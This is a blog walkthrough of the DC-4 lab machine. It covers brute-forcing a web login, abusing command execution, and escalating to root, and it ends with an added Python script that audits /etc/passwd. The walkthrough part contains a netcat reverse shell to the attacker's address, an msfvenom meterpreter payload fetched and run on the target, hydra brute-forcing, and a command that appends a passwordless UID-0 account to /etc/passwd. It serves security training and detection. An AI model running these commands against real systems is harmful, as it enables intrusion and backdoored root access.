
DC-4

2020-02-12 Target machine

Getting a shell

Scan the internal network with nmap to find the target's IP:

nmap -Pn 192.168.43.0/24

Nmap scan report for dc-4 (192.168.43.157)
Host is up (0.00025s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:DA:FB:D8 (Oracle VirtualBox virtual NIC)

Port 80 is open, so I opened it in a browser; it looks like the screenshot below.

There is only a login page. Directory scanning turned up nothing and fingerprinting showed nothing special, so I moved on to brute-forcing.
Using Burp Intruder in cluster bomb mode, with a list of candidate usernames, I brute-forced the password.
Finally found it:

After logging in, I found that commands can be executed.

Intercept the request to find the entry point that runs the command.

To get a shell we need to write a file; testing showed that wget is available.

I originally wanted to upload a webshell to the current directory, but permissions prevented it, so I ran a command directly instead:

nc 192.168.43.164 23333 -e /bin/bash

Listen on the attacking machine, and a session comes back.

To make use of msf, I changed to the tmp directory.

Then generate a payload on the attacking machine:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.164 LPORT=4444 -f elf > shell

Start a web server on the attacking machine:

/etc/init.d/apache2 start

Upload it to the tmp directory and add execute permission with chmod +x shell.
Start a listener in msf and get a session:

Privilege escalation

Information gathering:

OS           : Debian 9.8 (Linux 4.9.0-3-686)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux

Look at the home directory:

# Listing: /home

Mode Size Type Last modified Name

------

40755/rwxr-xr-x 4096 dir 2019-04-07 02:31:02 +0800 charles
40755/rwxr-xr-x 4096 dir 2019-04-07 02:30:51 +0800 jim
40755/rwxr-xr-x 4096 dir 2019-04-07 02:31:09 +0800 sam

Only jim's directory is accessible:

40755/rwxr-xr-x 4096 dir 2019-04-07 00:58:03 +0800 backups
100600/rw------- 528 fil 2019-04-06 18:20:21 +0800 mbox
104777/rwxrwxrwx 174 fil 2019-04-06 18:59:11 +0800 test.sh

backups contains a password file, old-passwords.bak, presumably jim's old passwords.

So try brute-forcing with hydra.

Log in over ssh.

Looking at mbox, it is an email from root.

On login there was a notice about mail in /var/mail, and it contains a file named jim:

From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is: ^xHhA&hvim0y

See ya,
Charles

That gives charles's password. After logging in as charles, use sudo -l to see which commands can be run:

Matching Defaults entries for charles on dc-4:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
(root) NOPASSWD: /usr/bin/teehee

/usr/bin/teehee --help shows how it is used:

Usage: /usr/bin/teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

-a, --append append to the given FILEs, do not overwrite
-i, --ignore-interrupts ignore interrupt signals
-p diagnose errors writing to non pipes
--output-error[=MODE] set behavior on write error. See MODE below
--help display this help and exit
--version output version information and exit

MODE determines behavior with write errors on the outputs:
'warn' diagnose errors writing to any output
'warn-nopipe' diagnose errors writing to any output not a pipe
'exit' exit on error writing to any output
'exit-nopipe' exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.

So write directly to passwd:

echo "hello::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

Privilege escalation succeeded and the flag is obtained:
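
A defensive check for the kind of change made above, as an added example that is not part of the original post: it parses passwd-format text and flags any entry other than root with UID 0, any entry with an empty password field, and malformed lines. The sample input is constructed for this example, except for the `hello` line, which is the entry the command above appends.

```python
"""Audit passwd-format text for backdoor-style accounts (added example)."""
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Finding:
    line_no: int
    user: str
    reason: str


def audit_passwd(text: str) -> List[Finding]:
    """Return one Finding per suspicious condition in /etc/passwd content.

    Flags malformed entries, an empty password field (no password set for
    the account), and UID 0 on any account other than root, which is what
    appending a line such as 'hello::0:0:::/bin/bash' produces.
    """
    findings: List[Finding] = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank lines and comments carry no account
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(Finding(line_no, line, "malformed entry: expected 7 colon-separated fields"))
            continue
        name, pw, uid, gid, _gecos, _home, _shell = fields
        if not (uid.isdigit() and gid.isdigit()):
            findings.append(Finding(line_no, name, "non-numeric UID or GID"))
            continue
        if pw == "":
            findings.append(Finding(line_no, name, "empty password field"))
        if int(uid) == 0 and name != "root":
            findings.append(Finding(line_no, name, "UID 0 on a non-root account"))
    return findings


# Constructed sample: the first four lines are made up for this example; the
# last line is the entry the walkthrough appends with `teehee -a /etc/passwd`.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jim:x:1001:1001:jim,,,:/home/jim:/bin/bash
charles:x:1002:1002:charles,,,:/home/charles:/bin/bash
hello::0:0:::/bin/bash
"""

if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f"line {f.line_no}: {f.user}: {f.reason}")
```

Running it over the real file (`audit_passwd(open("/etc/passwd").read())`) on a host, or over a copy pulled by a configuration-monitoring job, surfaces the appended account immediately.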

Author: damn1t

Link: http://microvorld.com/2020/02/12/靶机/DC-4/

Copyright: All articles in this blog are licensed under CC BY-NC-SA 3.0 unless stating additionally.
